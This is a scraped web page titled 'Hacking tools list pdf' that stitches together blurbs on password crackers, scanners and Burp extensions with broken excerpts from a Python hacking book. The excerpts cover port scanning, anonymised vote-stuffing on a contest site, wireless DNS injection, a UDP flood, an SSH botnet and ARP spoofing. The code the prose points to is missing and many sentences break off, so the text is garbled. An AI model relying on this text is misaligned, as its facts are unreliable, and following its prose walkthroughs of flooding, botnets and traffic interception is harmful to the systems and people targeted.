Hacking tools list pdf

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system. See the download page. Just run following command to install. Notwithstanding, dissimilar to Nessus, Arachni can just perform a scan against one host on one port at a time.

On the off chance that there are different web services running on a host and not serviced from the port, then repeated scan will must launch separately.

Arachni likewise has an exceptionally configurable structure. The plugins and settings for Arachni take into account accuracy checking, and all plugins are enabled by default. Reporting is a snap and could be designed in numerous diverse sorts of output.

Sqlmap is default in Kali Linux, Use and enjoy to get important information from database server. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

John, better known as John the Ripper, is a tool to find weak passwords of users in a server. John can map a dictionary or some search pattern as well as a password file to check for passwords. John supports different cracking modes and understands many ciphertext formats, like several DES variants, MD5 and blowfish.

Hashcat was written somewhere in the middle of However for some unknown reason, both of them did not support multi-threading. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

According to official website of thc-hydra, One of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system and different online services.

There are already several login hacking tools available, however the online services Either support more than one protocol to attack or support panellized Connects. All files must be encrypted with the same password, the more files you provide, the better. Have you ever mis-typed a password for unzip?

While the encryption algorithm used by zip is relatively secure, PK made cracking easy by providing hooks for very fast password-checking, directly in the zip file. Understanding these is crucial to zip password cracking. Tutorial: Fcrackzip Windows to crack zip password [Tutorial].

Must Read: Top 10 Password cracker software for Windows Aircrack-ng is not a tool, but it is a complete set of tools including used to audit wireless network security. All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It is easy to use. Python is one of the modern programming languages that allows you to gain access to BSD socket interfaces.

If you are new to this concept, BSD sockets give you an interface that will allow you to write applications so that you can do communications with a network right in between hosts. If you are able to know the IP address and the TCP ports that are associated with the service that you want to target, then you can better plan your attack.

Most of the time, this information is available to system administrators in an organization and this data is also something that admins need to hide from any attacker. Before you can launch any attack on any network, you will need to gain this information first. Making Your Port Scanner Port scanning is a method in which you can assess which of the ports in a targeted computer is open, and what kind of service is running on that specific port.

Since computers are operating to communicate with other devices and perform a function by opening a port to send and receive data, open ports can be a vulnerability that hackers will want to exploit. Think of an open port to be similar to an open window to a burglar — these open ports serve as a free passage to any hacker that will want to steal data or set up shop inside a computer to exploit its weaknesses for an extended amount of time.

Take note that port scanning is not an illegal activity to do — in fact, network security personnel scan the ports of client computers in order to learn about their vulnerabilities and apply the security protocol needed.

However, port scanning is also the best way for any hacker to discover new victims and find out the best way to hack their system. A port scanner will allow you to look at the hosts and the services that are attached to them. As you may have already guessed, sockets are behind mostly anything that involves network communications.

When you pull up a web browser, your computer opens a socket in order to communicate to a web server. The same thing happens when you communicate to other computers online, or send a request to your printer over your Wi-Fi. Pull up your text editor and then save the following code as portscanner.

Each website has a different features, but will usually read a particular text document, analyze it, and then display it to a user, just like the way a source file interacts with the Python interpreter.

There are different libraries that come with this programming language that can handle web content, but for this hack, you will be using Mechanize, which includes the primary class called Browser. Take a look at this sample script that will show you how to get a source code of a website: When you run this script, you will see syngress. As you may already know, web servers see to it that they log the IP addresses of different users that view their websites in order to identify them.

This can usually be prevented by using a VPN virtual private network , or by using Tor. What happens when you use a VPN is that all traffic gets routed to the private network automatically. With this concept, you get the idea that you can use Python to connect to the proxy servers instead, which will give your program an added layer of anonymity. You can use the Browser class to specify a proxy server that will be used by a particular program.

For this script, you can use the HTTP proxy provided by www. Just in any case this proxy is not available to be used anymore, you can simply go to the website and select an HTTP proxy that you can use.

You will then see that the website you are trying to access believes that you are using the Now, continue building your script: At this point, your browser already contains a single layer of anonymity. However, websites do use a string called user-agent in order to identify unique users that log in to their site. This string will usually allow the website to get useful information about a user in order to provide a tailored HTML code, which then provides a better user experience.

However, malicious websites can also use that information to exploit the browser that is being used by a targeted user. For example, there are certain user-agent strings that some travel websites use to detect users that browse using Macbooks, which then proceed to give these users more expensive options. Since you are using Mechanize, you can change the user-agent string just like how you change the proxy. The website that you are browsing now thinks that you are using a Netscape 6.

What happens after is that websites that you are going to visit will attempt to present cookies that they can use as a unique identifier in order to identify you as a repeat visitor when you go back to their site the next time. To prevent these websites from identifying you, you will need to see to it that you clear all the cookies from your browser whenever you perform functions that you want to be anonymous. Another built-in library in Python, called the Cookelib, will allow you to make use of various container types that will allow you to deal with cookies that website present you.

This will allow you to simply call the class using a browser object in the future. It also contains the functions that you were able to create earlier, which you can call individually or all at once using the anonymize function. The anonymize function will also allow you to select the option to wait for 60 seconds which will increase the time of requests that you send. While this will not change anything in the information that you submit to the website, this step will decrease the chance that the websites that you are visiting will recognize that the information being sent to them comes from a single source.

You will also notice that the file anonBrowser. Now, you can write a script where you can use the class that you have just created. In this example, you will be entering votes for an online competition on the website kittenwar.

Using this script, you should be able to visit the targeted website anonymously five times, which will allow you to enter five votes using the same computer: After running this script, you will be able to fetch the targeted web page using five different unique sessions, which means that you are using different cookies every time you visit.

Wireless Attack: Dnspwn Attack This attack is created by using the airpwn tool, which is a framework for packet injection for wireless This tool is created to listen to incoming packets and then injects content to the access point when the incoming data matches a pattern that is specified in the config file. To your target, your airpwn looks and behaves like the server that he is trying to communicate to. To perform this attack, you will need to have Backtrack or Kali Linux installed in your computer, as well as a wireless card adapter.

Follow these steps: 1. To do this, pull up airmon-ng from Kali Linux and then enter the following command. Once you have a monitor up and running, you can start creating the code for your attack. Create your code. You will need to make use of the scapy module in order to perform the dnspwn attack. Now that you have the scapy module, we can now make the function that will allow you to construe the request for the needed information and then do response injection. You can do this by working up the following layers: The scape module makes the entire process simple by removing away a lot of details that you do not need to be concerned about.

Once the other details has been abstracted away by scapy, you can use the following code: At this point, you have all the flags set for your attack. As you may have noticed, there is a certain limit when it comes to sending and receiving data through the network and your own networking interfaces. The reason for this limit is the amount of bandwidth that you have, and if other users are not hogging the bandwidth, the faster your connections will be.

When all the bandwidth that should be available to you, you are experiencing a DoS Denial of Service. Once you already found that service, you can make the program behave in a way that it is not supposed to do, which will cause the remote host to take up all its available resources and then take it offline. This will cause the host to ignore any application that are listening to that particular host and then reply with a packet that says ICMP Destination Unreachable.

To do this, all you need to do is to pull up your text editor and input the following code: Save this code as udpflood. To run the code, pull up IDLE and then execute the program, which will prompt you to enter all the other information that you need.

Take note that this hack is directed to only one port, but if you want to exploit all other 65, ports that are available. Chapter 9: Hacks for the Web You may be wondering how to get past certain website protection policies in order to get a file that you want, browse anonymously, or get more information about the website that you want to penetrate to launch a massive attack.

In this chapter, you will learn how you can perform Creat hacks on a website using some programs that you can create using Python. Creating an SSH Botnet Now that you know how to create a port scanner and you are aware of how you can find vulnerable targets, you can now proceed to exploit their vulnerabilities. One of the ways to do this is to exploit the Secure Shell protocol SSH in order to get login credentials from clients.

What is a botnet? Bots, as the name implies, are incredibly useful when it comes to automating services in practically any device.

Botnets, on the other hand, is a group of bots that are joined together by a network which allows system administrators e to efficiently do automated tasks over an entire system of users that are connected together by a server or a local network. While botnets are essentially tools for easy managing of several computers, they can also be tools that you can use for unintended purposes, such as creating a DoS or DDoS Distributed Denial of Service that may cause a website to load multiple times in a session or for commenting on social media sites continuously.

Assuming that the hosts credentials are stored in a file that has this format: username hostname:port password. Now that you have these credentials, you will need to consider the functions that you need to create.

This may mean that you need to run a status check to see running hosts, make an interactive shell session to communicate with a targeted host, and perform a command on selected hosts. To begin, you will need to import every member of the namespace fabric. Once you have these setup, you will not have to enter each password for each new connection. Now that you have this setup, you can now proceed to running the commands. To be able to do this, you will need to create a menu that will enable you execute the other tasks with the specified hosts using the execute function of Fabric.

Scraping Websites that Needs Login Credentials If you want to mine data from a website, you will find that you will first need to log in before being able to access any information that you want. This means that in order to get the data that you need, you will first need to extract all the details that you need to login to your targeted website.

Since it is prompting you to supply user credentials, you are unable to go into the website and mine the information that you want. As you may have guessed, you will have to build a dictionary that will allow you to put in details for the log in.

Chapter Understanding Attacks Using Python Hacking is not all about launching attacks — understanding how black hat hackers launch target and penetrate their target systems will make you understand how you can use your newfound knowledge to prevent your own system from being vulnerable to them. Knowing User Locations Out of Tweets If you have been using Twitter, you may think that you are tweeting your updates from sheer randomness; however, the truth is that you are following an informal formula for the tweets that you compose.

There are other data included in your tweet, which may not be visible in the body of your tweet, such as an image that you want to share or a location. To a hacker, all the information in your tweet contains something that will be important in writing an attack — when you think about it, you are giving away information about the person that you are interested in, links that you and your friend are likely to be interested in, and trends that you might want to learn about.

Your script will look like this: When your script returns with the above results, you are likely to deduce that the these teams are tweeting live from where they are. From this output, you may deduce that the Red Sox are playing in Toronto, while the Nationals are in Denver. Matching an IP Address to a Physical Location Most of the time, people are willing to post what is on their mind on social media sites, or perform attacks that they find using online tools that they can download, thinking that they will never have to face the consequences of their actions.

While most bullheaded yet inexperienced hackers and online trolls think that they can hide behind a fake account to conceal their identity, you can prove that these people are not as anonymous as they think they are. In fact, there are several ways to use libraries and third-party modules in Python to unmask the location and identity of a user based on his or her IP address. For example, you suspect that your system is being targeted by another hacker and you notice that your open ports are being sniffed by a particular IP address.

Python can help you do that using a script that is similar to what is going to be discussed in this section. Using this free database, you will aim to write a code that will match the IP addresses found on their list to cities. Once you are able to download the GeoCityLite database, you will be able to analyze the IP addresses down to locating the country name, state, postal code, and a general longitude and latitude.

To make the job easier, you can use a Python library created to analyze this database. In this hack, you will learn how to analyze a network capture, and examine the protocol layer of each packet using the tool called Dpkt. When you run this script, you will be able to find both the source and destination IP addresses: The next thing that you will want to do is to match these IP addresses with a physical location. You can improve the script that you have just created by creating an additional function retGeoStr , which will give you a physical location for the IP address that your code is able to locate.

For this example, you will be able to find the three-digit country code and the city for each IP address and then have the code display this information. Just in any case the function prompts you with an exception, handle it by providing a message that indicates that the address is not registered. Once you are able to add the function retGeostr to the script that you were able to produce earlier, you will be able to create a good packet analysis toolkit that will allow you to view the physical destinations of packets that you want to study.

Now that you are aware that your data is possibly being routed to too many different computers, you get the idea that you need to improve your security by securing your ports. You will want to make sure that your location is untraceable, and that is because of a good number or reasons. For the sake of practicing white hat hacking, you will want to learn how programmers are able to mask their location especially when they perform reconnaissance attacks or DoS attacks, which makes use of the Internet Protocol and see to it that you check your traffic from time to time to see if your activities are being listened to by an unknown IP address.

At the same time, you may also want to protect yourself from being targeted by black hat hackers by hiding your location. To black hat hackers, IP spoofing essentially lets them conceal their identity and location whenever they perform their attack. Doing so will also allow them to impersonate another computer system and defeat existing security measures which may require authentication based on their IP addresses.

This will allow an attacker to modify or stop all traffic, or intercept data sent over the network. Using the following code, you can catch all packets that are routed towards a targeted machine, which entails being able to see all the information that a targeted user sends out, which allows you to view private communication that is not protected by any form of encryption.

Find Information About the Targeted Machine To find out how you can hack your target, you will need to check the ARP cache on the machine that you want to attack. Take note of this to check the ARP cache while you have an ongoing attack and verify that you have changed the MAC address that corresponds to the gateway. Hacking Hacking the Hacker The Art of Invisibility Penetration Testing Basics. Penetration Testing Essentials Hackers Beware.

Network Performance and Security. Modern Web Penetration Testing From Hacking to Report Writing. Python Web Penetration Testing Cookbook. CompTIA Cybersecurit Wireshark for Security Professionals Cyber-Physical Attack Recover. Practical Information Security Management Phishing Dark Waters.

Designed to add minimal network overhead, it identifies application behavior that may be of interest to advanced testers. BurpSentinel : With BurpSentinel it is possible for the penetration tester to quickly and easily send a lot of malicious requests to parameters of a HTTP request. Not only that, but it also shows a lot of information of the HTTP responses, corresponding to the attack requests.

It's easy to find low-hanging fruit and hidden vulnerabilities like this, and it also allows the tester to focus on more important stuff! Autorize Burp: Autorize is an extension aimed at helping the penetration tester to detect authorization vulnerabilities—one of the more time-consuming tasks in a web application penetration test.

Flow : This extension provides a Proxy history-like view along with search filter capabilities for all Burp tools. Headless Burp : This extension allows you to run Burp Suite's Spider and Scanner tools in headless mode via the command-line.

In addition to logging requests and responses from all Burp Suite tools, the extension allows advanced filters to be defined to highlight interesting entries or filter logs to only those which match the filter. After performing normal mapping of an application's content, right click on the relevant target in the site map, and choose "Scan for WSDL files" from the context menu.

The extension will search the already discovered contents for URLs with the. The results of the scanning appear within the extension's output tab in the Burp Extender tool. JSParser : A python 2. This is especially useful for discovering AJAX requests when performing security research or bug bounty hunting. Knockpy : Knockpy is a python tool designed to enumerate subdomains on a target domain through a word list. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting.

Sublist3r enumerates subdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. During recon, this might help expand the target by detecting old or deprecated code. Wpscan : WPScan is a free for non-commercial use black box WordPress security scanner written for security professionals and bloggers to test the security of their sites.

Webscreenshot : A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script. Unfurl : Unfurl is a tool that analyzes large collections of URLs and estimates their entropies to sift out URLs that might be vulnerable to attack. Httprobe : Takes a list of domains and probes for working http and https servers.

Meg : Meg is a tool for fetching lots of URLs without taking a toll on the servers. It can be used to fetch many paths for many hosts, or fetching a single path for all hosts before moving on to the next path and repeating. Inspired by Tomnomnom's waybackurls. Dirsearch : A simple command line tool designed to brute force directories and files in websites.

It helps you find the security vulnerabilities in your application. Subfinder : Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. Subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well. EyeWitnees : EyeWitness is designed to take screenshots of websites, provide some server header info, and identify any default credentials.

EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line, nmap xml output, or nessus xml output.

The --timeout flag is completely optional, and lets you provide the max time to wait when trying to render and screenshot a web page.